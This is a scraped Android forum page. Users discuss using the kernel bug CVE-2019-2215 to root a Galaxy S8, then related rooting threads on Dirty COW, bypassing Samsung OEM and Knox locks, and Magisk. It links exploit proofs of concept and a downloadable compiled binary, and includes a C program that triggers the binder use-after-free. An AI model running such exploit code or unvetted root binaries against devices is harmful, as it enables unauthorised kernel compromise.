CVE-2019-2215 for root. - Samsung Galaxy S8 Guides, News, & Discussion

Can we use CVE-2019-2215 exploit to gain root?
Here is a list of Phones affected by the hack.
A “non-exhaustive list” of vulnerable phones includes:
Pixel 1
Pixel 1 XL
Pixel 2
Pixel 2 XL
Huawei P20
Xiaomi Redmi 5A
Xiaomi Redmi Note 5
Xiaomi A1
Oppo A3
Moto Z3
Oreo LG phones
Samsung S7
Samsung S8
Samsung S9
See the Ars article for more details. I wonder if we have a dev willing to turn this into a root app? And what's the ETA for that?
https://arstechnica.com/information...ty-that-gives-full-control-of-android-phones/

Looks promising from what I'm reading about it. I have yet to find an application using it to look at, though. Also, I hardly know how to make a root, so don't expect anything from me.

There's a PoC on the Google thread... just need someone to provide the means to root, and/or just write a bit to the correct partition or whatever to enable OEM unlocking:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414885

Looks promising, sounds like we still need a dev to pick this up. It's all there, it just needs a properly set up root app and we can gain root.

Here is the PoC compiled:
https://drive.google.com/file/d/10kJ9LvWq1AH1wdourLszXDMPSPbMMNXp/view?usp=drivesdk
You have to use an untrusted app, i.e. an Android terminal, Termux, ConnectBot, etc. From the app, copy it over to the app's home directory, chmod +x poc3, then ./poc3. It'll tell you the kernel was exploited if your device is vulnerable.
I can confirm the P2XL is vulnerable on the latest firmware (will be patched in the October updates on the Pixels).
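For readers wondering what the "is my device vulnerable" question actually reduces to, here is the bare trigger sequence behind the Project Zero PoC linked above, as an added example. It is not the P0 PoC and not code from any post in this thread; it assumes the binder device at /dev/binder and the BINDER_THREAD_EXIT ioctl number from the public binder UAPI header, and the function name and result codes are this example's own. It builds with the NDK and runs from an untrusted app context (Termux etc.), and also compiles on a Linux desktop, where /dev/binder is normally absent and the function just says so. On a patched kernel the sequence is harmless; on an unpatched production kernel the use-after-free is silent, which is why the real PoC layers a heap spray on top of it. If the full PoC stops at its writev() size check (the "writev() returns 0x1000" quoted later in this thread), that is the spray stage reporting that the freed binder_thread was not reclaimed the way the PoC expects: consistent with a patched kernel, but also with a kernel whose object layout differs from the Pixel 2's.

```c
/*
 * Added example, not the Project Zero PoC and not from any post in this
 * thread: the minimal CVE-2019-2215 trigger as described in P0 issue 1942,
 * wrapped as a function so it can be built with the NDK or on a Linux box.
 *
 * Vulnerable kernels: BINDER_THREAD_EXIT frees the calling thread's
 * binder_thread while epoll still holds a wait-queue entry inside it; the
 * later EPOLL_CTL_DEL walks that freed entry (use-after-free).
 * Fixed kernels ("ANDROID: binder: remove waitqueue when thread exits")
 * wake the queue with POLLFREE on exit so epoll drops its entry first,
 * and the same sequence is a no-op.
 *
 * On a production kernel the UAF itself is silent; on a KASAN build the
 * splat shows up in dmesg.
 */
#include <fcntl.h>
#include <stdio.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Same value as in <linux/android/binder.h>; redefined here so this file
 * compiles without the Android kernel headers. */
#ifndef BINDER_THREAD_EXIT
#define BINDER_THREAD_EXIT _IOW('b', 8, int)
#endif

/* Result codes are this example's own, not part of the PoC. */
enum trigger_result {
    TRIGGER_DONE = 0,         /* sequence ran; check dmesg on a KASAN kernel */
    TRIGGER_NO_BINDER = 1,    /* binder device not present / not openable */
    TRIGGER_EPOLL_FAILED = 2, /* fd could not be registered with epoll */
};

int trigger_cve_2019_2215(const char *binder_path)
{
    int fd = open(binder_path, O_RDONLY);
    if (fd < 0)
        return TRIGGER_NO_BINDER;

    int epfd = epoll_create1(0);
    if (epfd < 0) {
        close(fd);
        return TRIGGER_EPOLL_FAILED;
    }

    /* Step 1: epoll links a wait-queue entry into this thread's
     * binder_thread->wait. */
    struct epoll_event ev = { .events = EPOLLIN };
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev) < 0) {
        close(epfd);
        close(fd);
        return TRIGGER_EPOLL_FAILED;
    }

    /* Step 2: binder frees the binder_thread. Unpatched kernels leave
     * epoll's entry dangling into the freed allocation. */
    ioctl(fd, BINDER_THREAD_EXIT, NULL);

    /* Step 3: epoll unlinks its entry, i.e. remove_wait_queue() on freed
     * memory. Patched kernels already removed it during step 2. */
    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &ev);

    close(epfd);
    close(fd);
    return TRIGGER_DONE;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/dev/binder";
    switch (trigger_cve_2019_2215(path)) {
    case TRIGGER_DONE:
        printf("trigger sequence completed on %s; on a KASAN kernel check "
               "dmesg for a binder_thread use-after-free\n", path);
        break;
    case TRIGGER_NO_BINDER:
        printf("could not open %s (not an Android binder host?)\n", path);
        break;
    default:
        printf("epoll registration of %s failed\n", path);
        break;
    }
    return 0;
}
```

Build it with `aarch64-linux-android-clang -O2 -o trigger trigger.c` from the NDK, push it the same way as poc3 above, and run it from the app's own directory. Without a KASAN kernel it will not print anything useful about the outcome; it only shows which three syscalls the whole bug hangs on, and a kernel that does not crash under KASAN here is one that carries the fix.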

Don't know if it's possible or not, but I find it kind of nonsense to root a device without unlocking the bootloader. If you modify something inside the /system partition you need to disable dm-verity as well, for which you also need to flash a non-Samsung-signed kernel (that's the reason to unlock the bootloader), otherwise the device won't boot.
Also, forget about flashing TWRP without UB.

bamsbamx said:
Don't know if it's possible or not, but I find it kind of nonsense to root a device without unlocking the bootloader. If you modify something inside the /system partition you need to disable dm-verity as well, for which you also need to flash a non-Samsung-signed kernel (that's the reason to unlock the bootloader), otherwise the device won't boot.
Also, forget about flashing TWRP without UB.
I hear you, but if I can just get apps like AdAway, Titanium Backup, etc., I'll be happy. There are a lot of apps that need root that don't also need a custom kernel and, as far as I know, don't alter the system partition. This limited root was available for many generations of Galaxy and Note phones.
Front page of XDA now...
https://www.xda-developers.com/zero...it-google-pixel-huawei-xiaomi-samsung-others/

Confirmed. My kernel is clear and root is planted. I am on a Verizon Pixel 2, Android 10, different device but same. Will post the process when I have a moment.

Can't wait, bought a Pixel 2 just because this was posted.

I think the PoC is specific to the Pixel 2. I tried it on a Pixel and a Samsung S8 Active and no go. That said, this looks promising. I'm working on a version that will work with the Samsung S8 Active. WRT root being useless without an unlocked bootloader: not so. There are ways to persist as root without an unlocked bootloader and writing to /system. Will post more if I get anywhere.

Does anyone know or can help with a step-by-step process of using the PoC zip? I have a Pixel 2 and don't know how to go about using the PoC zip or the process of flashing it. Thank you, Sean.

petiolarissean said:
Does anyone know or can help with a step-by-step process of using the PoC zip? I have a Pixel 2 and don't know how to go about using the PoC zip or the process of flashing it. Thank you, Sean.
Push it to your phone using adb and run it in the shell. If you're vulnerable you should see "Exploited" if you run uname. This is an exploit that can be used to develop a root, but it needs development.

Yup, I was thinking of the same, to use this as a root vulnerability.

I tried to use Qu1ckr00t to root the 955U on Pie and it didn't work. The PoC needs to be modified to support the S8 and its Samsung kernel.

The PoC of Hernandez manipulates kernel data structures, the user process credentials, that are protected by Samsung Real-time Kernel Protection (RKP). Normally, the PoC should therefore not work on Samsung devices, or am I wrong with that?
The original PoC was reported to work on the S8 and S9, but I fear this was only because the PoC did not trigger RKP. Will have a look at the original PoC to assess that...

So mine ends on "writev() returns 0x1000", which means I'm not vulnerable, correct? Is that just because the PoC isn't made to work with my device, or am I not vulnerable in general?

We have https://github.com/grant-h/qu1ckr00t
AFAIK it needs to be modified for the S8; currently it's only working for the Pixel 2.
@elliwigy can you help here?

updesh94 said:
We have https://github.com/grant-h/qu1ckr00t
AFAIK it needs to be modified for the S8; currently it's only working for the Pixel 2.
@elliwigy can you help here?
Many people have already made and posted the PoC used there. You just gotta look around, but chances are it won't work unless your device is vulnerable and the PoC is tailored to your kernel/device.
I don't own any vulnerable devices, so I'm not working on it personally.

This seems to only be exploitable on Oreo bootloaders.
"ANDROID: binder: remove waitqueue when thread exits." patched the exploit and was added to the G950U kernel when Pie was released.
Therefore, Pie is not exploitable, and it seems that anyone running a V6 bootloader will not be able to use this exploit either.
The good news is, if you're running a V5 bootloader, it is theoretically possible to use this exploit. The bad news is I'm using a V6 bootloader. :/

pixlone said:
This seems to only be exploitable on Oreo bootloaders.
"ANDROID: binder: remove waitqueue when thread exits." patched the exploit and was added to the G950U kernel when Pie was released.
Therefore, Pie is not exploitable, and it seems that anyone running a V6 bootloader will not be able to use this exploit either.
The good news is, if you're running a V5 bootloader, it is theoretically possible to use this exploit. The bad news is I'm using a V6 bootloader. :/
Wow, thanks for clearing this up. I am on Pie but not sure if I am on the new bootloader or the older one, as I never updated when the update mentioned you won't be able to downgrade.

Related

Gain Root Access using the Dirty COW method

So, as some here probably know, there was a huge Linux kernel vulnerability that was discovered recently, that I *believe* gives every Android device root access, called the Dirty COW exploit. I am just wondering if anyone has actually tried applying this to the G5, as I imagine it should work with no issues. If not, maybe I will have to look into it a little deeper to see if I can get it working this weekend.
It does work on the VZW G5, but the issue we all need to consider before applying it is how to undo it. Root access alone isn't all that significant if we can't flash an original image (which requires an unlocked bootloader, unless I'm mistaken).
If you modify /system, OTAs won't apply, meaning you're stuck on whatever version you decided to root. This could be pretty terrible, especially for most of us XDA users, who enjoy being on the cutting edge!
phishfi said:
It does work on the VZW G5, but the issue we all need to consider before applying it is how to undo it. Root access alone isn't all that significant if we can't flash an original image (which requires an unlocked bootloader, unless I'm mistaken).
If you modify /system, OTAs won't apply, meaning you're stuck on whatever version you decided to root. This could be pretty terrible, especially for most of us XDA users, who enjoy being on the cutting edge!
I don't think an unlocked bootloader is necessary. The G2 and G3 were never unlocked, but all the ROMs were bumped.
I wonder if the 15A update from today will patch this loophole?
I would think some type of memory management or memory encryption patch to greatly reduce the chances of successful bit flips! Verizon is kinda sketchy on details and pushed this out rather quick, sure signs of "hmm, maybe I'll wait on this update!"
Does it work on the VZW LG G5? I need root access; temporary is OK.
I don't feel like messing up my phone until we have a guaranteed root and recovery like the G2.
Edit: here's a video someone made using this to root an HTC. Since it's kernel based, I'm guessing that it should work.
https://youtu.be/4xdMteqm994
Sent from darkharbinger81's Verizon LG G5, non-rooted yet
I have installed Debian on my laptop to try running this method, hopefully soon. I just hope the laptop I'm using can install the Android SDK or NDK; plus my laptop is a 32-bit operating system, so we'll see.
Sent from darkharbinger81's Verizon LG G5, non-rooted yet

Samsung Galaxy J3 Orbit (SM-S367VL) Looking for advice on how to root.

I've looked for quite a while for anything that could help me root the phone, and have had no success with anything. I'm worrying at this point that the bootloader is just locked and have to ask: is there anything else I can do to root this phone? Willing to try pretty much anything, even at the risk of bricking it.
Lavitz324 said:
I've looked for quite a while for anything that could help me root the phone, and have had no success with anything. I'm worrying at this point that the bootloader is just locked and have to ask: is there anything else I can do to root this phone? Willing to try pretty much anything, even at the risk of bricking it.
I'm interested in this too, but in all likelihood nobody with the knowledge is even working on it because this is a niche phone.
Locked bootloader.
Well, I have this phone now. I bought it because it was a good deal, so it seemed: less than $100 for the phone and service activation plan. I have rooted just about every Samsung I have ever owned. So here's what I have come up with. There is no OEM option in Developer options. On any other Samsung phone I always go right into Developer options and disable OEM by turning it off. Then I have used either the KingRoot APK or the Kingoroot APK in the past and they have worked; sometimes you have to find the perfect version to match your Android software specifically. Now, I have always had huge success with Odin and flashing TWRP via laptop or computer over a USB connection, but that's something each individual should personally take the time to educate themselves on, just in case. Sorry to say that the Samsung J3 Orbit with Total Wireless and Oreo 8.0 needs a serious look.
Lavitz324 said:
I've looked for quite a while for anything that could help me root the phone, and have had no success with anything. I'm worrying at this point that the bootloader is just locked and have to ask: is there anything else I can do to root this phone? Willing to try pretty much anything, even at the risk of bricking it.
Your phone is a 2018 model of the J3. When XDA finally makes a J3 (2018) thread I will request for this thread to be moved. Any root methods shown in J3 (2017) are likely not to work anymore since Samsung patched the methods used. The only way to root phones now is by buying the U variants of Samsung's phones, which are only available from Samsung's website under unlocked phones. Unlocked phones from Samsung have an unlocked bootloader by default.
thepcwiz101 said:
Your phone is a 2018 model of the J3. When XDA finally makes a J3 (2018) thread I will request for this thread to be moved. Any root methods shown in J3 (2017) are likely not to work anymore since Samsung patched the methods used. The only way to root phones now is by buying the U variants of Samsung's phones, which are only available from Samsung's website under unlocked phones. Unlocked phones from Samsung have an unlocked bootloader by default.
Incorrect statement.
My S9+ is a U variant with no OEM unlock option and did not come from Samsung. And my S9+ is still not rootable.
OuijaElite said:
Incorrect statement.
My S9+ is a U variant with no OEM unlock option and did not come from Samsung. And my S9+ is still not rootable.
Strange. What is the model number?
thepcwiz101 said:
Your phone is a 2018 model of the J3. When XDA finally makes a J3 (2018) thread I will request for this thread to be moved. Any root methods shown in J3 (2017) are likely not to work anymore since Samsung patched the methods used. The only way to root phones now is by buying the U variants of Samsung's phones, which are only available from Samsung's website under unlocked phones. Unlocked phones from Samsung have an unlocked bootloader by default.
U models are normally U.S. models, which are locked tight. I run an S8 as my everyday driver, which is rooted. The S9, S10 and most other US Snapdragon, and in this case Exynos, models all are locked tight. And they cannot be rooted as of right now. The SamPWND and other SamFail methods do not work anymore. The U model you are referring to is the U.S. SIM-unlocked model, not bootloader-unlocked. With the S series, F is the European bootloader-unlocked model; I don't know the European letter for the J series.
Until someone finds a way to push a rooted system img on a stock permissive combination kernel, root will not come, just like the S9 and S10 US models.
If these were US Snapdragon we could push a rooted system combination file with SafeStrap, just like we do on the newer bootloader on the S8 using EDL and Qualcomm 9008.
Just had an idea: in another thread on this forum a guy says he made a modified version of Odin that can flash mismatched models. So just flash a model version of the J3 Orbit that can be rooted, or at least is OEM unlock capable, to be able to flash TWRP and then be able to root through TWRP.
If flashing a J3 with a model number different than SM-S367VL would brick it, just extract the .img partitions like boot.img or whatever the partition may be with Ubuntu and restore them one by one until you find which one makes the phone boot.
I don't know much about phones when it comes to this depth of modification. But I had an LG Zone 3 that used this method to turn an unrootable model number version into a different model number that was rootable. Before I flashed the .img partitions of the stock software the screen had lines all over it, so using screen mirroring I was able to root the different model number software, then download a partition backup and restore app, then restore the partitions that were for the original model number.
So basically it took both model numbers and combined some partitions of each to make it work properly.
In my head I can totally see this working. It just depends on how close to the same hardware each model number of the Galaxy J3 has, I guess.
I wish I would have noticed/seen this a bit sooner. Any progress or luck? I have the J337U...
I know Chimera Tool is able to remove Knox, KG lock, OEM lock, RMM, MDM, of which mine shows KG lock: on, OEM lock: on, FRP lock: off. Trying to flash anything gives the error "insufficient payment" something. So there's got to be a way around it. Also, I found it interesting that the FCC ID has J337T instead of U... wonder why that is...
(Anyone know where I can get stock J260AZ/AIO (Cricket) firmware, not paid? I've literally checked everywhere.)
We need someone to take that new 0-day exploit root PoC, mod it however, and release it.
Found this [Have not tried it yet]
Came across an article on androidbiits. Not sure it's actually viable. Unfortunately I can't post the direct link until I have enough posts under my belt.
I'm willing to pitch in if someone can point me in the right direction.
Yhuda
How is it now? Have you found how to root this phone? Please add a developer to find out how to root the Samsung J3 Orbit!
For my KG lock on, OEM lock on J337U, which also has some new MDM/RMM on it from the consumer side, I used Chimera Tool to set KG lock to Complete.
This also switched the OEM lock to off and showed the toggle in Dev options.
1st flash of the Magisk patched img worked. But after connecting to Wi-Fi, Knox enrollment and instantly a security message popped up and locked up the entire device. No USB connection or anything.
Factory reset.
Same issue, then it locks up.
So for try 3, flash the patched boot, let it boot.
AS SOON AS IT boots to Android, hit the Airplane Mode toggle to activate it to stop Knox enrollment.
Was able to unlock the bootloader with a comb file that was compatible, flashed stock TracFone, updated to 9 Pie...
used a gig pressed power button ???
9 Pie TracFone J3 Orbit.
Patched AP file with Magisk, ran with Odin: says no way, fail. I was able to reflash with stock firmware, so it doesn't work on mine...
Any other luck?
Thanks
I would really like to know if anyone has succeeded either in rooting, SIM unlocking or flashing a different firmware on this model.
I was able to access OEM unlock on my J3 Orbit (SM-S367VL) via factory binary after flashing combination firmware.
That is as far as I've gotten. I am assuming you would want to run ADB download mode to flash anything, as factory binary seems to have some security measures against full bootloader unlock built in.

Anyone Tell Me [ How to make Root and TWRP for a specific device ]

Hi guys! I have used lots of Android phones over 10 years and am also familiar with them. I always try to root every phone, but the problem is that not every Android phone can be rooted. So, please, can anyone tell me how I can make root for any device and how I can make TWRP for any device?
Thank you in advance.
As far as compiling TWRP, you can start with this thread. Devices such as Pixels upgraded to A10 don't have TWRP, because recovery has changed drastically and development of TWRP has not yet caught up.
Root is available for any device that is rootable. Magisk does a pretty good job of covering the bases and is under active development, so properly reported issues are generally addressed.
Finding an exploit to be able to root a device is a different matter. Some, like Pixels, are straightforward to root, since if bought from Google (not a carrier directly) they have unlockable bootloaders allowing the installation of non-stock images. On a device that does not allow the bootloader to be unlocked, an exploit to achieve root must be found. That is often the issue, combined with the fact that many of these devices do not attract developers to purchase them, and thus no attempts are made.
Animesh._.Mamgain said:
Hi guys! I have used lots of Android phones over 10 years and am also familiar with them. I always try to root every phone, but the problem is that not every Android phone can be rooted. So, please, can anyone tell me how I can make root for any device and how I can make TWRP for any device?
Thank you in advance.
If the device is a device that has a locked bootloader that can not be unlocked, you will not be able to use TWRP. These devices can only be rooted if there is a rooting app or rooting program available for PC or android that has an exploit that works on the device.
If the bootloader is locked, you won't be able to install TWRP or use TWRP to root the device and you will not be able to flash a Magisk patched boot.img to achieve root.
If there are no exploits available that are proven to work on the device, you won't be able to root the device.
Sent from my SM-S767VL using Tapatalk

Root method for Samsung Galaxy Xcover Fieldpro? (SM-G889A)

Anyone know of a working method to root this phone?
I have a few on the AT&T network. I couldn't find a sub-forum here for this specific device.
I am also looking for pointers. Trying to edit my build.prop, but if I can get full-on root and recovery, I'd be elated.
It's currently not possible to root the Xcover FieldPro since ROMs for this model are unavailable to the public; even tools like Frija can't download it. The original ROM is needed to make TWRP or patch boot.img with Magisk.
josselin2196 said:
It's currently not possible to root the Xcover FieldPro since ROMs for this model are unavailable to the public; even tools like Frija can't download it. The original ROM is needed to make TWRP or patch boot.img with Magisk.
I have the BL5 stock ROMs and combination files. Had to pay for them. Would love to share them with developers who can cook something up, like the cool people did for my S8 Active with that SamFail V2 ROM or whatever. As it stands, even with flashing the combination file that has a permissive state on the kernel, I still can't get it running for user purposes. It's set up purely for development. If you could get me the build number info, I'll try to track down your ROM for you; I found a bunch of them, but only downloaded my own bootloader version so that I didn't update the bootloader and screw myself.
The only thing I can think of is unzipping the ROM, putting the SU files in all the proper places, zipping it back up, and then flashing it, but I'm unsure if that would even work.
Has anything changed on root options for this device?
There's an XDA thread out for a paid service that was supposedly good for up to certain versions of firmware on several Galaxy devices (up to early 2020 and earlier security patches, I think).
The guy had listed an Xcover Pro as one of the successes of his patch, so I had hopes.
Since this FieldPro is not even a Snapdragon chipset, but an Exynos, I figured it was less restricted and someone might have heard of an exploit by now.

Question How to root Android 13?

Hi guys, I'm looking to root my A525F with One UI 5.0.
Also looking for the necessary files to disable encryption.
Also, I've received the November update for my country.
I have rooted my A52 4G on Android 13 with the Magisk method.
llranga said:
I have rooted my A52 4G on Android 13 with the Magisk method.
Nice.
Can you please share the exact method you carried on?
Follow the guide here to install TWRP and disable force encryption: https://forum.xda-developers.com/t/recovery-official-twrp-3-7-for-galaxy-a52-4g-and-a72-4g.4405751/
After that just flash Magisk.
Greetings to the XDA team and all the other good people,
I want to root my Samsung Galaxy A52 4G, and just wanted to ask where I should start so I do it successfully, without upside-down moments. I already updated my phone to the latest, so now the phone is running Android 13.
I am a beginner in this. I educated myself from some videos online and on the XDA forum and saw that I can make my device more secure with root, and I can disable system and app trackers.
So my first question is, do I need to downgrade to Android 12 so the success rate becomes higher, or can I stick with Android 13 and still get success for the end goal?
My second question is whether what I wrote above is true.
The third question is, how do I get my device running again if rooting fails?
The fourth question is, can I unroot my device if I want to at some moment?
My fifth and last question is, is rooting worthwhile and needed so I can achieve my goals?
I still think I know nothing and want to expand my knowledge, so I ask people who are masters in this field to help me out with this, so I can become happier.
Thanks for considering my request.
- your dear noobie user epeu.
You can root your phone. But you should not panic. Carefully read the instructions and do it patiently without skipping any of the steps.
I'm also not an expert, but I have done rooting of more than 10 phones without failing.
You have to unlock your bootloader before rooting.
I doubt your statement about the device becoming more secure with root. It depends on what you alter after root. Yes, you can improve privacy.
Also, your banking apps may stop working after rooting, so you have to apply the necessary modules (security fixes) before getting them to work again.
If rooting fails, provided the phone is not hard bricked, you can flash your original firmware to restore the phone. What I always do is keep all the original firmware ready with me before doing any rooting.
Yes, you can unroot by flashing the original firmware.
The last question is difficult to answer. The majority of people use their phones without rooting. If you want to be different, it's up to you.
